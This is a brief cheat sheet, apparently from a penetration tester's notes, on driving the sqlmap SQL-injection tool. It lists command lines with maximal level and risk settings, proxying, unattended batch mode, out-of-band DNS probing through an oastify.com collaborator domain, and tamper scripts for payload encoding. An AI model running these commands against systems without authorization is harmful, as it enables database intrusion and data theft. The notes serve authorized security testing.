SQLmap
Automate SQL Injections
Documentation
https://github.com/sqlmapproject/sqlmap/wiki/Usage
From Request - HTTP:80
sqlmap -r http.request -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080 From Request - HTTPS:443
sqlmap -r http.request --force-ssl -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080 or the http.request file needs to have special HTTP header Host: server:443
Batch Silent Mode without questions
sqlmap -r http.request --force-ssl --answers="follow=Y" --batchDNS Collaborator (under root)
Tip: register new HTTP proxy on port 8081 and send all probes from sqlmap to this lister in order filter proxy history based on sqlmap listener.
Use --dns-domain switch to instruct nmap use DNS probes against your collaborator server
sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8081 --dns-domain e7mxq58krq154r5ka6wess5el5ryfo3d.oastify.com --risk=3 --level=5Tampering
Tampering scripts for payload encoding using --tamper switch.
A list of all existing tampering scripts is available using --list-tampers switch or looking at github repository /tamper folder
URL target & Parameters
You can read HTTP request from a file addressing payload by asterix symbol (*).
HTTP Proxy
Databases
The most common DBMSs the remaining ones look at sqlmap wiki --dbms.
Base64 Encoding
By default sqlmap encode values in query string by URL encoding. When you need to encode payload using base64 encoding use the following switch with a parameter name
HTTP method - DELETE
Last updated
Was this helpful?